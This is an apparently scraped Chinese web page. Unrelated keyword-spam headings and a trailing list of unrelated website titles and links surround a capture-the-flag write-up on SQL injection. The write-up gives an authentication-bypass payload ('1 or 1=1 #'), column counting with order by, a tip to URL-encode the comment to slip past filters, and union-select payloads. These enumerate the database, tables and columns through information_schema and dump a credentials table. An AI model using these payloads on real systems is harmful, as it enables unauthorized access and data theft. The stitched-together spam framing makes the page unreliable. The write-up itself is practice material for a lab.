当前位置: 首页 > news >正文

做梯子的企业网站洛阳住房和城乡建设部网站

做梯子的企业网站,洛阳住房和城乡建设部网站,软件商城安装,wordpress互动游戏一、题目简介#xff1a; 二、通关思路#xff1a; 1、首先查看页面源代码#xff1a; 我们发现可以使用工具sqlmap来拿到flag#xff0c;我们先尝试手动注入。 2、 打开靶机#xff0c;映入眼帘的是登录界面#xff0c;首先尝试万能密码能否破解。 username: 1 or 11…一、题目简介 二、通关思路 1、首先查看页面源代码 我们发现可以使用工具sqlmap来拿到flag我们先尝试手动注入。 2、 打开靶机映入眼帘的是登录界面首先尝试万能密码能否破解。 username: 1 or 11 # password: 随便写任意值 提交submit发现可以登录 并在 Your password 处发现一段乱码疑似为flag提交发现错误这并不是flag说明flag在别处。 3、通过万能密码已知注入类型为 字符型闭合方式为 单引号闭合尝试查看字段数量。 当 order by 3 时页面显示如图 当 order by 4 时页面显示如图 Unknown column 4说明页面报错了说明字段数为3。 注这里#使用URL编码格式% 十六进制数目的是防止被过滤在本题目中若使用 # 或 --是无法检测出字段数量的所以在以后的sql注入题目中最好使用%23。 4、查看回显 1 union select 1,2,3 %23 5、发现回显位 开始注出数据库库名表名列明最终拿到flag。 注出库名 1 union select 1,2,database() %23 注出表名 1 union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schemadatabase()) %23 注出列名 1 union select 1,2,(select group_concat(column_name)from information_schema.columns where table_namel0ve1ysq1) %23 拿到flag 1 union select 1,2,(select group_concat(id,username,password) from l0ve1ysq1) %23 成功拿到flag通关。
http://www.w-s-a.com/news/10065/

相关文章:

  • 潍坊网站建设怎样商品网站建设设计思路
  • 建网站公司是如何赚钱南昌营销网站公司哪家好
  • 淘宝客网站管理质量好网站建设费用
  • 网站建设教程搭建青岛中企动力做网站怎么样
  • wordpress最底部网站优化怎么弄
  • 二手市场网站建设的目的长沙ui设计公司
  • 微信公众号做留言网站wordpress详情页选择模板
  • php网站开发面向对象教程如何做分享赚钱的网站
  • 山东网站建设最便宜常州网站建站公司
  • 网站地图 seo中国建设招标网是私人网站吗
  • 高中作文网站全网营销有哪些平台
  • 网站构建建设制作平台上海搬家公司收费价目表
  • 成功案例展示网站做网站赚多少钱
  • 建设银行网站用什么字体网站建站后维护需要做哪些
  • 有哪些做平面设计好素材网站有哪些开网站建设
  • 国际交流网站平台有哪些筑建网
  • 网站程序是如何开发的江门市住房建设管理局网站
  • 网站建设一般需要几个步骤昵图网免费素材
  • 个人网站建设需求说明书微信域名防封在线生成
  • 专业网站建设的公司wordpress后台没有模板
  • 哈尔滨网站运营服务商制作外贸网站公司
  • 个人网站需要备案宁波网站推广工具
  • 苏州建设银行网站首页wordpress修改密码
  • 网站建设员工技能要求网站制作简单协议
  • 没有ipc备案的网站wordpress isux主题
  • 清远做网站电子商务网站建设需要的语言及特点6
  • 万州那家做网站c语言基础知识入门
  • 齐河网站建设公司价格网站建设包括什么
  • 论坛网站开发费用怎么把文件放到网站的根目录
  • 海南省零售户电商网站官渡区住房和城乡建设局网站